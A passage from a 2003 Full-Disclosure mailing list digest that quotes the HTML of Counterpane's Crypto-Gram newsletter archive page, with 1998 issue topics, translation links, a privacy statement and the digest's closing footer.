	> <TD class="black-text">Breaking RSA, declassifying Skipjack, secure audit logs, WIPO</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9806.html">15&nbsp;Jun&nbsp;1998</a></TH>
	> <TD class="black-text">Side channel attacks, risks of key escrow, pseudo-random number generators</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9805.html">15&nbsp;May&nbsp;1998</a></TH>
	> <TD class="black-text">AES, secret story of non-secret encryption, conditional purchase orders</TD>
	> </TR>
	> <TR><TD colspan=2>
	>
	> <P class="black-text"><BR><STRONG class="black-bold-text"><a name="trans">Translations</a></STRONG>
	> <BR>Kript&oacute;polis translates Crypto-Gram into <a href="http://www.kriptopolis.com/index.php?id=C0_12_1">Spanish</a>.  <a href="http://www.communicationvalley.it/crypto-gram.html">Italian</a> translations, by Communication Valley S.P.A., are available on the web or as a mailing list.  Holger Hasselbach has translated several issues of Crypto-Gram into <a href="http://www.galad.com/extras/cg/cg.htm">German</a>, and Fernandes Gilbert has translated some issues into <a href="http://perso.wanadoo.fr/gilbert.fernandes/cryptogram.html">French</a>. 
	>
	> <P class="black-text"><STRONG class="black-bold-text"><a name="privacy">Privacy Statement</a></STRONG>
	> <BR>Counterpane Internet Security, Inc. and Counterpane Labs will not use the Crypto-Gram mailing list for any other purpose than e-mailing Crypto-Gram.  We will not use the mailing list for company marketing, nor will we sell the list to any third parties.
	>
	> </TD></TR>
	> </TABLE>
	>
	>                   </td>
	>                   <td width="10">&nbsp;</td>
	>                 </tr>
	>                 <!---- articles ------------------------->
	>               </table>
	>    <img src="images/clear.gif" alt="" border="0" width="1" height="21"><br>
	>               <a href="#" onclick="scrollTo(0,0)"><img src="images/back_to_top.gif" alt="TOP" border="0" width="27" height="9"></a></td>
	>   <td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="1" height="1"></td>
	>  </tr>
	>  </table>
	>  <table cellpadding="0" cellspacing="0" border="0" width="404">
	>   <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>   <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="17"></td></tr>
	>   <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>   <tr><td class="black-text">Copyright Counterpane Internet Security, Inc., 2003<BR>
	> <a href="permiss.html">Reprint Permission</a></td></tr>
	>   <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="50"></td></tr>
	>  </table>
	>
	> <!-------end of middle column------------------->
	> </td>
	>
	>   </tr>
	> </table>
	>
	> <!-------end of global table------------------->
	>
	> </body>
	> </html>
	
	
	
	--__--__--
	
	
	End of Full-Disclosure Digest
	

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/ms-tnef
Size: 137466 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030903/55ddde63/attachment.bin
